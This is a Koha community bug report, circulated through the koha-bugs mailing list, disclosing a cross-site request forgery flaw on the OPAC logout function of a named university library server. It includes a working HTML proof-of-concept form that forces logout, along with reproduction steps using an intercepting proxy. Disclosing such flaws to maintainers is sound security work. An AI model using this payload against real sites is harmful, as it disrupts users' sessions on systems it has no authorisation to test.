https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=23238
Bug ID: 23238
Summary: CSRF On Logout Page
Change sponsored?: ---
Product: Koha
Version: unspecified
Hardware: All
OS: All
Status: NEW
Severity: normal
Priority: P5 - low
Component: Web services
Assignee: [email protected]
Reporter: [email protected]
QA Contact: [email protected]
Created attachment 91132
-->
https://bugs.koha-community.org/bugzilla3/attachment.cgi?id=91132&action=edit
PFA the Google Drive link for the video
Vulnerability: CSRF on logout page
Vulnerability Description: Cross-Site Request Forgery (CSRF) is an attack that
forces an end user to execute unwanted actions on a web application in which
they're currently authenticated. With a little help of social engineering (such
as sending a link via email or chat), an attacker may trick the users of a web
application into executing actions of the attacker's choosing.
Vulnerable URL: https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl
CSRF POC:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ils.ddn.upes.ac.in:8001/cgi-bin/koha/opac-main.pl";>
<input type="hidden" name="logout.x" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Steps to reproduce:
1. Login with valid credentials
2. Start any proxy tool to intercept the request.
3. Click logout
4. Send to "repeator"
5. Change "referer" header
6. Observe the output
7. Create an HTML file using the CSRF POC mentioned above
8. Login again
9. Open the CSRF html file on a new tab
10. Submit request
11. Results would reflect on main account
POC:
PFA the video
--
You are receiving this mail because:
You are the assignee for the bug.
You are watching all bug changes.
_______________________________________________
Koha-bugs mailing list
[email protected]
http://lists.koha-community.org/cgi-bin/mailman/listinfo/koha-bugs
website : http://www.koha-community.org/
git : http://git.koha-community.org/
bugs : http://bugs.koha-community.org/
